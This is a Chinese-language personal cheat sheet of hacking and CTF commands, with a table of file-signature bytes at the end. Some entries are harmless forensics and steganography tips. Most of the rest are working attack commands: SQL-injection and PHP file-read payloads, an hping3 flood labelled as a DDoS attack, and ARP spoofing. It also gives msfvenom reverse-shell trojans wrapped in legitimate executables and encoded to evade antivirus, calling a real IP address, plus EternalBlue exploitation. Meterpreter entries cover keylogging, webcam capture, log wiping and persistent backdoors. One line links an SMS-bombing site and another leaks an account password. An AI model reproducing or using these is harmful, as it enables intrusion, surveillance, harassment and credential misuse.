软件:
1 bless(类似于winhex)把文件按照16进制打开
2 binwalk 分离文件,也可以使用dd命令或foremost
3 ssh -p url 使用端口连接ssh
4 nc url 端口 使用 nc连接远程主机
5 githacker --url url --folder result
5 dirsearch 扫描网站后台目录
6 yijian 强大的工具
7 zip2john zip压缩包路径 >passwd.txt(获得hash文件);john passwd.txt 最终获得密码
8 ida64 查看源代码,逆向相关
9 sqlmap 扫描网站类型以及是否可以注入  sqlmap -u url/id=1 --tables ,--dump
10 chrome 扩展插件(hackbar),类似于重发器
11 base64转换 echo '需要转换的内容'  |base64
12 nmap 端口扫描 nmap -A -T4 ip
13 hping DDOS攻击 hping3 -S -c 1000 -d 4096  -d 64 -w 1111 --flood ip 
14 arpspoof arp欺骗 arpspoof -i 网卡 -t 目标ip 网关
15 nethogs 监控网络流量
16 cansina 类似dirsearch cansina -u <site_url> -p <payload_file>
17 checksec 检查文件信息(是否含有栈(zhan)溢出) checksec --file=文件
18 图片是base64编码的可以借助html打开 <img src="data:image/jpg;base64,编码
19 png图片16进制开头 89 50 4E 47
20 stegsolve 修改图片颜色
21 outguess outguess -k 密码-r 需要破解的文件名 -t 转出的文件名
22 zsh配置文件里边加入 nsetopt prompt_cr prompt_sp 解决运行c的时候多出来一个百分号
23 tplmap tplmap -u 链接 Simple_SSTI_2
24 lsof -i 端口号 查看端口占用
25 ps -aux |grep 软件名 查看软件进程
26 killall -9 软件名   强制杀死软件
27 pngcheck 图片  检测图片是否有高度错误
28 010editor 类似于winhex bless
29 post传参 curl -d 'what=flag' url 给url传递"what=flag"
30 zsteg  检测图片是否行有lsb隐写内容
31 unar解压文件就不会乱码
32 本地文件包含  php读取文件 ?file=php://filter/read/convert.base64-encode/resource=flag.php     
33 Secret File 构造pyload ?file=php://filter/convert.base64-encode/resource=flag.php php://filter/read=convert.base64-encode/resource=xxx
34 php代码审计source.php?file=source.php?/../../../../ffffllllaaaagggg 
35 dbeaver 数据库图形化软件
36 sql万能登陆 ?username=admin%27or%271%27=%271&password=admin%27or%271%27=%271
37 修改表名(将表名user改为users)
   alter table user rename to users;
   修改列名(将字段名username改为name)
   alter table users change uesrname name varchar(30);
    1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

    拆分开来如下
    1';
    alter table words rename to words1;
    alter table `1919810931114514` rename to words;
    alter table words change flag id varchar(50);
38 ./frpc -c ./frpc.ini&&./frps -c ./frps.ini
39 curl -X url(使用特定方法请求网页文本) -v显示详细信息
40 302跳转之类的可以使用curl请求
41 git log显示日志
42 git diff xxx 对比
43 git stash pop/list
44 svn泄漏 dvcs-ripper 工具中的 rip-svn.pl rip-svn -u url  cd .svn;cat wc.db |grep -a flag 然后慢慢找
45 rip-hg -u url/.hg/ hg status;如果服务端删除了 flag 文件的话，那么可尝试从历史记录里寻找。路径是 .hg/store/data/
46 提交代码 git add . && git push git add git commit -m "提交信息"
47 X-Forwarded-For:123.123.123.123   模拟ip
    Referer:https://www.google.com   模拟网页请求
48 flask-session-cookie-manager
49 msfconsole targer32 使用eternalblue_doublepulsar use exploit/windows/smb/eternalblue_doublepulsar
解决乱码
chcp 65001  字符乱码
screenshot   截屏
download AHK.ahk  下载文件
webcam_snap 拍照
webcam_stream  网页拍照

50 msfconsole enternalblue x86机器使用 eternalblue_doublepulsar,如果失败用 set PROCESSINJECT explorer.exe set payload windows/meterpreter/reverse_tcp
51 apache 文件上传xxx.php.xxx
52 目录穿越 http://eci-2zehy09y3rook5b2ywcg.cloudeci1.ichunqiu.com/img../ 点点需要跟在上一个文件夹后边
53 octave 科学计算器
54 Word给的文字类似禅语，故想到使用“与佛论禅”进行解码（开头记着加上佛曰两字）
55 dnsenum --enum benet.com  DNSenum是一款非常强大的域名信息收集工具
56 exploit/multi/handler 监听模块   必须设置这个set payload windows/meterpreter/reverse_tcp
57 systeminfo > systeminfo_win10.txt 提取目标机器的系统信息,使用 python2 windows-exploit-suggester.py --database 2021-06-20-mssb.xls --systeminfo systeminfo_10.txt 列出可用漏洞
58 木马的payload必须和监听设置的payload 对应
59 msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.112 LPORT=3335 -e x64/shikata_ga_nai -b '\x00\x0a\xff' -x 1.exe -i 40 -f exe -o 2.exe     windows直接反弹Shell
60 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.28 LPORT=4444 R > newbie.apk 安卓
61 msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=1.116.58.229 LPORT=6789 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 15 -x 6789.exe -f exe -o muma.exe windows反弹
62 auxiliary/server/socks_proxy   使用代理去访问主机 
63 msfvenom -p windows/meterpreter/reverse_tcp_rc4 LHOST=1.116.58.229 LPORT=6789 -f exe -e x86/shikata_ga_nai -i 20 --encrypt aes256 -x putty.exe -o run.exe
64 nmap -v -n -p445 --script smb-vuln-ms17-010 192.168.1.225/24 
65 msfvenom -a x64 --platform linux  -p linux/x64/meterpreter/reverse_tcp  LHOST=1.116.58.229 LPORT=6759  -i 3 -f elf -o test
66 net user test 123456 /add && net localgroup administrators test /add
67 Arch显示bug nohup kwin_x11 --replace&
68 短信轰炸 http://www.ydhz.xyz/wd/
69 uictl enable  keyboard   启用键盘记录
70 execute  -H -i -f cmd.exe 在后台打开cmd
80 clearev 清理痕迹
81 run persistence -U -X  -i 5 -p 6789 -r 1.116.58.229 创建隐藏后门
82 migrate 1416
83 Account:User_20210714154226 Password:vdvpV1Qk 魅族解锁bl帐号
84 

_______________文件头______________________________________________

JPEG (jpg)，文件头：FFD8FF
PNG (png)，文件头：89504E47
GIF (gif)，文件头：47494638
TIFF (tif)，文件头：49492A00
Windows Bitmap (bmp)，文件头：424D
CAD (dwg)，文件头：41433130
Adobe Photoshop (psd)，文件头：38425053
Rich Text Format (rtf)，文件头：7B5C727466
XML (xml)，文件头：3C3F786D6C
HTML (html)，文件头：68746D6C3E
Email [thorough only] (eml)，文件头：44656C69766572792D646174653A
Outlook Express (dbx)，文件头：CFAD12FEC5FD746F
Outlook (pst)，文件头：2142444E
MS Word/Excel (xls.or.doc)，文件头：D0CF11E0
MS Access (mdb)，文件头：5374616E64617264204A
WordPerfect (wpd)，文件头：FF575043
Adobe Acrobat (pdf)，文件头：255044462D312E
Quicken (qdf)，文件头：AC9EBD8F
Windows Password (pwl)，文件头：E3828596
ZIP Archive (zip)，文件头：504B0304
RAR Archive (rar)，文件头：52617221
Wave (wav)，文件头：57415645
AVI (avi)，文件头：41564920
Real Audio (ram)，文件头：2E7261FD
Real Media (rm)，文件头：2E524D46
MPEG (mpg)，文件头：000001BA
MPEG (mpg)，文件头：000001B3
Quicktime (mov)，文件头：6D6F6F76
Windows Media (asf)，文件头：3026B2758E66CF11
MIDI (mid)，文件头：4D546864
______________________________________________________________
png图片19 20 是长度 23 24 是宽 16进制
______________________________________________________________
zip文件判断有无加密是在第7,8行,0000就是伪加密
50 4B 01 02 是目录中文件头标记

